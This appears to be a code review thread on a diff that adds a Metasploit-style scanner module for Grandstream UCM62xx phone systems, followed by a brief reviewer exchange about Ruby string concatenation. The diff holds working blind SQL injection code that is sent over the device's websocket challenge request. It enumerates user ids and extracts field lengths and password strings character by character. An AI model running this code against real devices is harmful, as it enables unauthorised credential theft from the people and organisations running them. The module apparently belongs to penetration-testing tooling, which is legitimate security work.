modules/auxiliary/scanner/http/grandstream_ucm62xx_sql_account_guess.rb

```diff
@@ -0,0 +1,219 @@
+      OptInt.new('ID_SCAN', [true, 'The number of initial user ids to scan', 30])
+    ])
+  end
+
+  # Craft the SQL injection into the challenge request
+  def create_injection_request(payload)
+    id = Rex::Text.rand_text_alphanumeric(12)
+    req = "{\"type\":\"request\",\"message\":{\"transactionid\":\"#{id}\",\"version\":\"1.0\",\"action\":\"challenge\",\"username\":\""
+    req.concat(payload)
+    req.concat('"}}')
+    req
+  end
+
+  # Retrieve the server's response and pull out the status response. The return value is
+  # the server's response value (or 1 on failure).
+  def recv_wsframe(wsock)
+    res = wsock.get_wsframe
+    return 1 unless res
+
+    begin
+      res_json = JSON.parse(res.payload_data)
+    rescue JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'Failed to parse the returned JSON response. ')
+    end
+
+    status = res_json.dig('message', 'status')
+    return 1 if status.nil?
+
+    status
+  end
+
+  # Guess valid user ids in the database. These are sequential (0, 1, 2, etc) with the default
+  # admin user starting at 0. Return an array of valid ids.
+  def guess_user_ids
+    return_array = Array.new
+
+    datastore['ID_SCAN'].times do |n|
+      wsock = connect_ws(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/websockify')
+      )
+
+      wsock.put_wstext(create_injection_request("' OR user_id=#{n}--"))
+      next unless recv_wsframe(wsock) == 0
+
+      return_array << n
+    end
+
+    return_array
+  end
+
+  # A generic injection to guess a fields length. This assumes the field won't be longer
+  # than 64 characters. Which is probably a safe bet.
+  def guess_field_length(id, field)
+    64.times do |n|
+      wsock = connect_ws(
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, '/websockify')
+      )
+
+      wsock.put_wstext(create_injection_request("\' OR user_id=#{id} AND LENGTH(#{field})=#{n}--"))
+      next unless recv_wsframe(wsock) == 0
+
+      return n
+    end
+
+    return 0
+  end
+
+  # A generic injection to guess a string field. This implementation guesses all printable
+  # characters (which is inline with allowed password values). It excludes \ since, while
+  # the user can technically use it in a password, you can't actually log in if the character
+  # is present. Returns the guessed value
+  def guess_string(id, field, length)
+    string = ''
+    length.times do |n|
+      for printable in 0x20...0x7e
+
+        next unless printable != 0x5c
+
+        char = printable.chr
+
+        wsock = connect_ws(
+          'method' => 'GET',
+          'uri' => normalize_uri(target_uri.path, '/websockify')
+        )
+        temp_string = string + char
+
+        wsock.put_wstext(create_injection_request("\' OR user_id=#{id} AND substr(#{field},1,#{temp_string.length})='#{temp_string}'--"))
+        next unless recv_wsframe(wsock) == 0
+
+        string.concat(char)
```

Comment:
```ruby
string += char
```

Reply:
Other reviews I've been given have explicitly stated not to use `+=` and to prefer `<<` or `concat` as they are supposedly faster (although that really doesn't matter in this context).

Reply:
> Other reviews I've been given have explicitly stated not to use `+=` and to prefer `<<` or `concat` as they are supposedly faster (although that really doesn't matter in this context).

That doesn't sound right. Who cares so long as rubocop doesn't complain.

Reply:
This is now dead code.